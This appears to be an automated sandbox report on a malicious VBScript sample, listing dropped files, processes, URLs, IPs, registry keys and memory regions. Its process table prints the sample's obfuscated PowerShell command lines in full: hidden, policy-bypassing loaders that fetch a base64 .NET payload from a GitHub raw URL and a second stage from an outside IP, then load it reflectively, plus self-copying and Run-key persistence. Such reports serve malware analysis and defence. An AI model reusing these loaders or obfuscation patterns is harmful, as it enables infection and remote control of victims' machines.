Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
WW8kzvnphl.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\ProgramData\autopatia.vbs
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kzmjudtg.gn3.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ufyz4xus.d05.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vvp2ytn3.kpy.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z0q5ealq.aek.psm1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\WW8kzvnphl.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnUjFsJysndXJsID0gJysnUUxlJysnaHR0cCcrJ3M6Ly8nKydyYScrJ3cnKycuZ2l0aCcrJ3UnKydidXNlcmNvbnRlbnQnKycuY28nKydtL05vRGV0ZWN0T24vTm9EZXQnKydlJysnYycrJ3RPbi9yJysnZWZzL2hlYWRzLycrJ20nKydhaW4vRGV0YWhOb3RoLScrJ1YudHgnKyd0UUxlOyBSMWxiYXNlNjRDbycrJ24nKyd0ZW50ID0gKE5ldy1PYmonKydlY3QgU3lzdGUnKydtLk5lJysndCcrJy4nKydXZScrJ2JDJysnbGknKydlbnQpLkRvdycrJ25sb2FkJysnU3RyaW4nKydnJysnKFInKycxbHVyJysnbCk7JysnIFIxbGJpbicrJ2FyeScrJ0MnKydvbnRlbnQnKycgJysnPSBbU3lzdCcrJ2VtLicrJ0NvbnZlcnRdOjpGcicrJ29tQicrJ2FzZTY0U3RyJysnaW4nKydnKFIxbGJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpJysnOyBSJysnMWwnKydhc3MnKydlbWInKydseSA9IFtSZWYnKydsJysnZWN0aW9uLkEnKydzJysnc2UnKydtYmx5XTo6TCcrJ29hZCgnKydSMWxiaW5hJysncnlDb250JysnZW50KTsgJysnWycrJ2RubGliJysnLklPJysnLkgnKydvbWVdJysnOjonKydWQUkoZHprdHh0LicrJ0dGQ1JSLzAnKyc1NC8zJysnNS4zNC4nKyc1LjInKyc3Ly86cHR0aCcrJ2R6aycrJywgZHprJysnMWR6aycrJywgJysnZHprJysnQzprJysnc2gnKydQcm9ncicrJ2FtRGF0YWtzaGR6aywgZHprYXV0b3AnKydhdGlhZCcrJ3prLCcrJyBkemsnKydSZWcnKydBc21keicrJ2ssIGQnKyd6a2QnKyd6aycrJyxkJysnemtkJysnemspJyktUkVQTEFDZSAgKFtjaEFyXTEwMCtbY2hBcl0xMjIrW2NoQXJdMTA3KSxbY2hBcl0zNCAtUkVQTEFDZSAna3NoJyxbY2hBcl05Mi1DUkVwbEFDZSAgKFtjaEFyXTgyK1tjaEFyXTQ5K1tjaEFyXTEwOCksW2NoQXJdMzYgLVJFUExBQ2UnUUxlJyxbY2hBcl0zOSl8ICYoIChbc3RySU5nXSR2ZXJCT1NlUHJlZkVSRW5jZSlbMSwzXSsneCctak9JbicnKQ==';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
"(('R1l'+'url = '+'QLe'+'http'+'s://'+'ra'+'w'+'.gith'+'u'+'busercontent'+'.co'+'m/NoDetectOn/NoDet'+'e'+'c'+'tOn/r'+'efs/heads/'+'m'+'ain/DetahNoth-'+'V.tx'+'tQLe;
R1lbase64Co'+'n'+'tent = (New-Obj'+'ect Syste'+'m.Ne'+'t'+'.'+'We'+'bC'+'li'+'ent).Dow'+'nload'+'Strin'+'g'+'(R'+'1lur'+'l);'+'
R1lbin'+'ary'+'C'+'ontent'+' '+'= [Syst'+'em.'+'Convert]::Fr'+'omB'+'ase64Str'+'in'+'g(R1lbase64'+'Cont'+'en'+'t)'+'; R'+'1l'+'ass'+'emb'+'ly
= [Ref'+'l'+'ection.A'+'s'+'se'+'mbly]::L'+'oad('+'R1lbina'+'ryCont'+'ent); '+'['+'dnlib'+'.IO'+'.H'+'ome]'+'::'+'VAI(dzktxt.'+'GFCRR/0'+'54/3'+'5.34.'+'5.2'+'7//:ptth'+'dzk'+',
dzk'+'1dzk'+', '+'dzk'+'C:k'+'sh'+'Progr'+'amDatakshdzk, dzkautop'+'atiad'+'zk,'+' dzk'+'Reg'+'Asmdz'+'k, d'+'zkd'+'zk'+',d'+'zkd'+'zk)')-REPLACe
([chAr]100+[chAr]122+[chAr]107),[chAr]34 -REPLACe 'ksh',[chAr]92-CREplACe ([chAr]82+[chAr]49+[chAr]108),[chAr]36 -REPLACe'QLe',[chAr]39)|
&( ([strINg]$verBOSePrefEREnce)[1,3]+'x'-jOIn'')"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\autopatia.vbs"
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\ProgramData\autopatia.vbs"
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\ProgramData\autopatia.vbs"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
|
185.199.111.133
|
||
|
http://72.5.43.53
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://raw.githubusercontent.com
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://raw.githubusercontent.com
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
https://raw.githubusercont
|
unknown
|
||
|
http://72.5.43.53/450/RRCFG.txt
|
72.5.43.53
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://72.5.43.53(
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtQLe;
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://oneget.org
|
unknown
|
There are 13 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
raw.githubusercontent.com
|
185.199.111.133
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
72.5.43.53
|
unknown
|
United States
|
||
|
185.199.111.133
|
raw.githubusercontent.com
|
Netherlands
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Path
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 5 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
2648F5A6000
|
heap
|
page read and write
|
||
|
22A81570000
|
heap
|
page read and write
|
||
|
7FFD9B8F4000
|
trusted library allocation
|
page read and write
|
||
|
22A9B7C0000
|
heap
|
page read and write
|
||
|
22A84E94000
|
trusted library allocation
|
page read and write
|
||
|
22A9B546000
|
heap
|
page read and write
|
||
|
142CD019000
|
heap
|
page read and write
|
||
|
7FFD9BBE0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC60000
|
trusted library allocation
|
page read and write
|
||
|
22A83702000
|
trusted library allocation
|
page read and write
|
||
|
2004D3A0000
|
heap
|
page read and write
|
||
|
2004D2E7000
|
heap
|
page read and write
|
||
|
8071339000
|
stack
|
page read and write
|
||
|
807107E000
|
stack
|
page read and write
|
||
|
21D947E0000
|
trusted library allocation
|
page read and write
|
||
|
2648F597000
|
heap
|
page read and write
|
||
|
2648F5AB000
|
heap
|
page read and write
|
||
|
21D947A0000
|
heap
|
page read and write
|
||
|
22A84B48000
|
trusted library allocation
|
page read and write
|
||
|
2648F502000
|
heap
|
page read and write
|
||
|
2004B364000
|
heap
|
page read and write
|
||
|
142CF083000
|
heap
|
page read and write
|
||
|
7FFD9BBD0000
|
trusted library allocation
|
page read and write
|
||
|
22A8390B000
|
trusted library allocation
|
page read and write
|
||
|
21DACEC2000
|
heap
|
page read and write
|
||
|
22A84C17000
|
trusted library allocation
|
page read and write
|
||
|
2648FA80000
|
heap
|
page read and write
|
||
|
8070E7E000
|
stack
|
page read and write
|
||
|
142CF098000
|
heap
|
page read and write
|
||
|
2648F552000
|
heap
|
page read and write
|
||
|
21DAD090000
|
heap
|
page read and write
|
||
|
21D94C90000
|
heap
|
page execute and read and write
|
||
|
BD7CFF000
|
stack
|
page read and write
|
||
|
2648F9FD000
|
heap
|
page read and write
|
||
|
7FFD9BAE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2004D284000
|
heap
|
page read and write
|
||
|
7FFD9B9C6000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BAA1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB60000
|
trusted library allocation
|
page read and write
|
||
|
22A815C9000
|
heap
|
page read and write
|
||
|
142CCFFE000
|
heap
|
page read and write
|
||
|
7FFD9BB20000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC30000
|
trusted library allocation
|
page read and write
|
||
|
21DACEEE000
|
heap
|
page read and write
|
||
|
2648F55F000
|
heap
|
page read and write
|
||
|
22A84BCA000
|
trusted library allocation
|
page read and write
|
||
|
2648F9EC000
|
heap
|
page read and write
|
||
|
2648F516000
|
heap
|
page read and write
|
||
|
D007BFF000
|
unkown
|
page read and write
|
||
|
7FFD9BB00000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB50000
|
trusted library allocation
|
page read and write
|
||
|
2004D2A6000
|
heap
|
page read and write
|
||
|
2648F5AC000
|
heap
|
page read and write
|
||
|
21D92ED1000
|
heap
|
page read and write
|
||
|
2004B260000
|
heap
|
page read and write
|
||
|
21D92DC0000
|
heap
|
page read and write
|
||
|
22A9B57B000
|
heap
|
page read and write
|
||
|
142CF031000
|
heap
|
page read and write
|
||
|
22A9B670000
|
heap
|
page read and write
|
||
|
22AC44D5000
|
heap
|
page read and write
|
||
|
7FFD9BAB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2648D9B0000
|
heap
|
page read and write
|
||
|
2004D675000
|
heap
|
page read and write
|
||
|
2648F50A000
|
heap
|
page read and write
|
||
|
22A9B548000
|
heap
|
page read and write
|
||
|
21D94820000
|
trusted library allocation
|
page read and write
|
||
|
21D92FB0000
|
heap
|
page read and write
|
||
|
21DACF80000
|
heap
|
page read and write
|
||
|
2648F5A6000
|
heap
|
page read and write
|
||
|
2648F9FA000
|
heap
|
page read and write
|
||
|
2004D288000
|
heap
|
page read and write
|
||
|
2648F4FA000
|
heap
|
page read and write
|
||
|
21D92DE0000
|
heap
|
page read and write
|
||
|
142CCFD8000
|
heap
|
page read and write
|
||
|
2004D301000
|
heap
|
page read and write
|
||
|
2004D130000
|
heap
|
page read and write
|
||
|
21D951F9000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB70000
|
trusted library allocation
|
page read and write
|
||
|
2648DB4B000
|
heap
|
page read and write
|
||
|
2648F5A6000
|
heap
|
page read and write
|
||
|
21D94DCC000
|
trusted library allocation
|
page read and write
|
||
|
2648F52D000
|
heap
|
page read and write
|
||
|
2648DA76000
|
heap
|
page read and write
|
||
|
2648DD48000
|
heap
|
page read and write
|
||
|
2648F630000
|
heap
|
page read and write
|
||
|
21DAD0C3000
|
heap
|
page read and write
|
||
|
21D92E40000
|
heap
|
page read and write
|
||
|
2004B290000
|
heap
|
page read and write
|
||
|
21D9484A000
|
heap
|
page read and write
|
||
|
2004D2D4000
|
heap
|
page read and write
|
||
|
7FFD9BAC2000
|
trusted library allocation
|
page read and write
|
||
|
2648F5A8000
|
heap
|
page read and write
|
||
|
22A838E3000
|
trusted library allocation
|
page read and write
|
||
|
22A82F70000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9A6000
|
trusted library allocation
|
page read and write
|
||
|
79F2EFE000
|
stack
|
page read and write
|
||
|
21D95222000
|
trusted library allocation
|
page read and write
|
||
|
2648F525000
|
heap
|
page read and write
|
||
|
7FFD9BC9B000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BBA0000
|
trusted library allocation
|
page read and write
|
||
|
2648F9F7000
|
heap
|
page read and write
|
||
|
22A81645000
|
heap
|
page read and write
|
||
|
21D94D82000
|
trusted library allocation
|
page read and write
|
||
|
21DACF50000
|
heap
|
page execute and read and write
|
||
|
BD7DFF000
|
stack
|
page read and write
|
||
|
142CF04C000
|
heap
|
page read and write
|
||
|
7FFD9BB90000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BBA0000
|
trusted library allocation
|
page read and write
|
||
|
8070F7F000
|
stack
|
page read and write
|
||
|
21DACE48000
|
heap
|
page read and write
|
||
|
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
|
BD78FA000
|
stack
|
page read and write
|
||
|
7FFD9BC73000
|
trusted library allocation
|
page read and write
|
||
|
22AC4290000
|
heap
|
page read and write
|
||
|
2004D5A1000
|
heap
|
page read and write
|
||
|
21D92FF5000
|
heap
|
page read and write
|
||
|
21D94D31000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B90B000
|
trusted library allocation
|
page read and write
|
||
|
142CCFFF000
|
heap
|
page read and write
|
||
|
22A934F1000
|
trusted library allocation
|
page read and write
|
||
|
2648DA90000
|
heap
|
page read and write
|
||
|
7FFD9BC00000
|
trusted library allocation
|
page read and write
|
||
|
2648F563000
|
heap
|
page read and write
|
||
|
2004F060000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8FD000
|
trusted library allocation
|
page execute and read and write
|
||
|
142CEB40000
|
heap
|
page read and write
|
||
|
142CF047000
|
heap
|
page read and write
|
||
|
2648F54F000
|
heap
|
page read and write
|
||
|
2648DB44000
|
heap
|
page read and write
|
||
|
2004B331000
|
heap
|
page read and write
|
||
|
7FFD9BAAA000
|
trusted library allocation
|
page read and write
|
||
|
2648F5A6000
|
heap
|
page read and write
|
||
|
54D707C000
|
stack
|
page read and write
|
||
|
22A851DE000
|
trusted library allocation
|
page read and write
|
||
|
22A81608000
|
heap
|
page read and write
|
||
|
2004D308000
|
heap
|
page read and write
|
||
|
2648DACC000
|
heap
|
page read and write
|
||
|
2004B270000
|
heap
|
page read and write
|
||
|
22A84E39000
|
trusted library allocation
|
page read and write
|
||
|
54D753E000
|
stack
|
page read and write
|
||
|
2004B318000
|
heap
|
page read and write
|
||
|
142CF036000
|
heap
|
page read and write
|
||
|
22A9B82B000
|
heap
|
page read and write
|
||
|
7FFD9BBF0000
|
trusted library allocation
|
page read and write
|
||
|
22A84BF3000
|
trusted library allocation
|
page read and write
|
||
|
21DACEEA000
|
heap
|
page read and write
|
||
|
142CD1B0000
|
heap
|
page read and write
|
||
|
22A9B803000
|
heap
|
page read and write
|
||
|
142CF135000
|
heap
|
page read and write
|
||
|
2004D2A7000
|
heap
|
page read and write
|
||
|
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
|
21D92E26000
|
heap
|
page read and write
|
||
|
21D94E37000
|
trusted library allocation
|
page read and write
|
||
|
2004D275000
|
heap
|
page read and write
|
||
|
22A82EC0000
|
trusted library allocation
|
page read and write
|
||
|
2648F4F1000
|
heap
|
page read and write
|
||
|
21D94D87000
|
trusted library allocation
|
page read and write
|
||
|
21D95336000
|
trusted library allocation
|
page read and write
|
||
|
807208D000
|
stack
|
page read and write
|
||
|
D7CA7FE000
|
stack
|
page read and write
|
||
|
2004D2A4000
|
heap
|
page read and write
|
||
|
7FFD9B99C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BB10000
|
trusted library allocation
|
page read and write
|
||
|
142CF044000
|
heap
|
page read and write
|
||
|
2004D2C0000
|
heap
|
page read and write
|
||
|
21D94E47000
|
trusted library allocation
|
page read and write
|
||
|
8070FFD000
|
stack
|
page read and write
|
||
|
2648F4F1000
|
heap
|
page read and write
|
||
|
54D70FF000
|
stack
|
page read and write
|
||
|
54D76BB000
|
stack
|
page read and write
|
||
|
80714BE000
|
stack
|
page read and write
|
||
|
142CCFF8000
|
heap
|
page read and write
|
||
|
D7CA8FF000
|
stack
|
page read and write
|
||
|
D007CFF000
|
stack
|
page read and write
|
||
|
7FFD9BAD2000
|
trusted library allocation
|
page read and write
|
||
|
22A93AFE000
|
trusted library allocation
|
page read and write
|
||
|
807153E000
|
stack
|
page read and write
|
||
|
21D95267000
|
trusted library allocation
|
page read and write
|
||
|
22A815FE000
|
heap
|
page read and write
|
||
|
22AC44D0000
|
heap
|
page read and write
|
||
|
142CEC55000
|
heap
|
page read and write
|
||
|
2648F5A7000
|
heap
|
page read and write
|
||
|
22A838CB000
|
trusted library allocation
|
page read and write
|
||
|
21D94D20000
|
heap
|
page read and write
|
||
|
21DACFA0000
|
heap
|
page read and write
|
||
|
142CCFF0000
|
heap
|
page read and write
|
||
|
7FFD9B9D6000
|
trusted library allocation
|
page execute and read and write
|
||
|
2004D2B7000
|
heap
|
page read and write
|
||
|
21D92E6D000
|
heap
|
page read and write
|
||
|
21DACE40000
|
heap
|
page read and write
|
||
|
142CD0D0000
|
heap
|
page read and write
|
||
|
7FFD9BB10000
|
trusted library allocation
|
page read and write
|
||
|
2004B339000
|
heap
|
page read and write
|
||
|
22A93555000
|
trusted library allocation
|
page read and write
|
||
|
2648DB4D000
|
heap
|
page read and write
|
||
|
2648F51A000
|
heap
|
page read and write
|
||
|
54D71FE000
|
stack
|
page read and write
|
||
|
7FFD9BC71000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAF0000
|
trusted library allocation
|
page read and write
|
||
|
142CF06B000
|
heap
|
page read and write
|
||
|
7FFD9BB00000
|
trusted library allocation
|
page read and write
|
||
|
2648DB4D000
|
heap
|
page read and write
|
||
|
2648DB4D000
|
heap
|
page read and write
|
||
|
2004D2BC000
|
heap
|
page read and write
|
||
|
142CF058000
|
heap
|
page read and write
|
||
|
142CF405000
|
heap
|
page read and write
|
||
|
22A9B690000
|
heap
|
page read and write
|
||
|
21DACEF2000
|
heap
|
page read and write
|
||
|
2004D3A1000
|
heap
|
page read and write
|
||
|
22A839FE000
|
trusted library allocation
|
page read and write
|
||
|
54D6EFE000
|
stack
|
page read and write
|
||
|
142CD1D0000
|
heap
|
page read and write
|
||
|
2004D2CB000
|
heap
|
page read and write
|
||
|
21D92E69000
|
heap
|
page read and write
|
||
|
22A9B4E0000
|
heap
|
page read and write
|
||
|
22A9B859000
|
heap
|
page read and write
|
||
|
2004B338000
|
heap
|
page read and write
|
||
|
2004D2A1000
|
heap
|
page read and write
|
||
|
2648DB13000
|
heap
|
page read and write
|
||
|
2648D9E0000
|
heap
|
page read and write
|
||
|
22A84BCE000
|
trusted library allocation
|
page read and write
|
||
|
2004D288000
|
heap
|
page read and write
|
||
|
79F2DFD000
|
stack
|
page read and write
|
||
|
2648F570000
|
heap
|
page read and write
|
||
|
21DACEB5000
|
heap
|
page read and write
|
||
|
142CEC6A000
|
heap
|
page read and write
|
||
|
2648DD4E000
|
heap
|
page read and write
|
||
|
54D6F7E000
|
stack
|
page read and write
|
||
|
142CCFF9000
|
heap
|
page read and write
|
||
|
2648FA06000
|
heap
|
page read and write
|
||
|
22A83910000
|
trusted library allocation
|
page read and write
|
||
|
142CF040000
|
heap
|
page read and write
|
||
|
2648F9ED000
|
heap
|
page read and write
|
||
|
2004D2A7000
|
heap
|
page read and write
|
||
|
22A9B821000
|
heap
|
page read and write
|
||
|
7FFD9BBB0000
|
trusted library allocation
|
page read and write
|
||
|
2004D2ED000
|
heap
|
page read and write
|
||
|
21D94800000
|
trusted library allocation
|
page read and write
|
||
|
2004B310000
|
heap
|
page read and write
|
||
|
2648F9F3000
|
heap
|
page read and write
|
||
|
2648F5AA000
|
heap
|
page read and write
|
||
|
2648F58B000
|
heap
|
page read and write
|
||
|
142CF070000
|
heap
|
page read and write
|
||
|
21DA4DA4000
|
trusted library allocation
|
page read and write
|
||
|
142CEB80000
|
heap
|
page read and write
|
||
|
7FFD9BA9A000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8E3000
|
trusted library allocation
|
page execute and read and write
|
||
|
142CD00A000
|
heap
|
page read and write
|
||
|
7FFD9B9AC000
|
trusted library allocation
|
page execute and read and write
|
||
|
142CF060000
|
heap
|
page read and write
|
||
|
22A833A0000
|
heap
|
page execute and read and write
|
||
|
21D92FF0000
|
heap
|
page read and write
|
||
|
22A8160C000
|
heap
|
page read and write
|
||
|
22A83A08000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAF0000
|
trusted library allocation
|
page read and write
|
||
|
2004D2DB000
|
heap
|
page read and write
|
||
|
7FFD9BAC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
22AC42BB000
|
heap
|
page read and write
|
||
|
22A84BEF000
|
trusted library allocation
|
page read and write
|
||
|
D7CABFE000
|
stack
|
page read and write
|
||
|
2648F566000
|
heap
|
page read and write
|
||
|
2004B34C000
|
heap
|
page read and write
|
||
|
BD79FE000
|
stack
|
page read and write
|
||
|
22A84E0D000
|
trusted library allocation
|
page read and write
|
||
|
2648F9FC000
|
heap
|
page read and write
|
||
|
54D717F000
|
stack
|
page read and write
|
||
|
2648F5A8000
|
heap
|
page read and write
|
||
|
2648DD4E000
|
heap
|
page read and write
|
||
|
2648F57F000
|
heap
|
page read and write
|
||
|
7FFD9BB90000
|
trusted library allocation
|
page read and write
|
||
|
22A85115000
|
trusted library allocation
|
page read and write
|
||
|
2648F505000
|
heap
|
page read and write
|
||
|
2648F9E7000
|
heap
|
page read and write
|
||
|
2004D2B7000
|
heap
|
page read and write
|
||
|
2004B2D0000
|
heap
|
page read and write
|
||
|
7FFD9BBF0000
|
trusted library allocation
|
page read and write
|
||
|
22A81490000
|
heap
|
page read and write
|
||
|
22A9B807000
|
heap
|
page read and write
|
||
|
142CECE0000
|
heap
|
page read and write
|
||
|
21D94E41000
|
trusted library allocation
|
page read and write
|
||
|
2648FA05000
|
heap
|
page read and write
|
||
|
22A833BC000
|
heap
|
page read and write
|
||
|
807163B000
|
stack
|
page read and write
|
||
|
2648F9E7000
|
heap
|
page read and write
|
||
|
142CD365000
|
heap
|
page read and write
|
||
|
142CF131000
|
heap
|
page read and write
|
||
|
22AC44D4000
|
heap
|
page read and write
|
||
|
7FFD9BB70000
|
trusted library allocation
|
page read and write
|
||
|
22A838D6000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BBD0000
|
trusted library allocation
|
page read and write
|
||
|
2004D2C8000
|
heap
|
page read and write
|
||
|
2004D280000
|
heap
|
page read and write
|
||
|
2004D7AD000
|
heap
|
page read and write
|
||
|
7FFD9BAE0000
|
trusted library allocation
|
page read and write
|
||
|
2004D2DB000
|
heap
|
page read and write
|
||
|
22A844FC000
|
trusted library allocation
|
page read and write
|
||
|
142CF05B000
|
heap
|
page read and write
|
||
|
2648F9FD000
|
heap
|
page read and write
|
||
|
2004B2D5000
|
heap
|
page read and write
|
||
|
79F27FE000
|
stack
|
page read and write
|
||
|
80710FE000
|
stack
|
page read and write
|
||
|
142CF03C000
|
heap
|
page read and write
|
||
|
80713BC000
|
stack
|
page read and write
|
||
|
54D763E000
|
stack
|
page read and write
|
||
|
8070EFE000
|
stack
|
page read and write
|
||
|
2648F5A9000
|
heap
|
page read and write
|
||
|
2648F5A6000
|
heap
|
page read and write
|
||
|
2004B34B000
|
heap
|
page read and write
|
||
|
22A9B5F6000
|
heap
|
page execute and read and write
|
||
|
142CF037000
|
heap
|
page read and write
|
||
|
2648F590000
|
heap
|
page read and write
|
||
|
142CCFFF000
|
heap
|
page read and write
|
||
|
2004D1A0000
|
heap
|
page read and write
|
||
|
2648F9FD000
|
heap
|
page read and write
|
||
|
142CF53A000
|
heap
|
page read and write
|
||
|
2648F52A000
|
heap
|
page read and write
|
||
|
54D6E73000
|
stack
|
page read and write
|
||
|
7FFD9BBC0000
|
trusted library allocation
|
page read and write
|
||
|
2648FAF8000
|
heap
|
page read and write
|
||
|
7FFD9B8FC000
|
trusted library allocation
|
page read and write
|
||
|
142CEC6A000
|
heap
|
page read and write
|
||
|
2004D2B4000
|
heap
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
21D94E44000
|
trusted library allocation
|
page read and write
|
||
|
22A9B7D8000
|
heap
|
page read and write
|
||
|
2004D2B0000
|
heap
|
page read and write
|
||
|
2648FA22000
|
heap
|
page read and write
|
||
|
142CF050000
|
heap
|
page read and write
|
||
|
142CF06B000
|
heap
|
page read and write
|
||
|
2004D2D0000
|
heap
|
page read and write
|
||
|
54D72BF000
|
stack
|
page read and write
|
||
|
2648F597000
|
heap
|
page read and write
|
||
|
2648DD4E000
|
heap
|
page read and write
|
||
|
2004D2AC000
|
heap
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
21DACE8D000
|
heap
|
page read and write
|
||
|
79F30FB000
|
stack
|
page read and write
|
||
|
D7CA6FF000
|
stack
|
page read and write
|
||
|
142CD024000
|
heap
|
page read and write
|
||
|
2004B359000
|
heap
|
page read and write
|
||
|
7FFD9BB40000
|
trusted library allocation
|
page read and write
|
||
|
54D733E000
|
stack
|
page read and write
|
||
|
2648F9DD000
|
heap
|
page read and write
|
||
|
142CF05B000
|
heap
|
page read and write
|
||
|
2648F502000
|
heap
|
page read and write
|
||
|
22A83938000
|
trusted library allocation
|
page read and write
|
||
|
80715BE000
|
stack
|
page read and write
|
||
|
142CF047000
|
heap
|
page read and write
|
||
|
22A8164B000
|
heap
|
page read and write
|
||
|
21D92E2E000
|
heap
|
page read and write
|
||
|
22A83A00000
|
trusted library allocation
|
page read and write
|
||
|
D007AFD000
|
stack
|
page read and write
|
||
|
21D95084000
|
trusted library allocation
|
page read and write
|
||
|
22A8355C000
|
trusted library allocation
|
page read and write
|
||
|
21D95224000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B996000
|
trusted library allocation
|
page read and write
|
||
|
21DACF27000
|
heap
|
page read and write
|
||
|
2648DD48000
|
heap
|
page read and write
|
||
|
7FFD9BA91000
|
trusted library allocation
|
page read and write
|
||
|
142CD360000
|
heap
|
page read and write
|
||
|
142CF330000
|
heap
|
page read and write
|
||
|
2004D288000
|
heap
|
page read and write
|
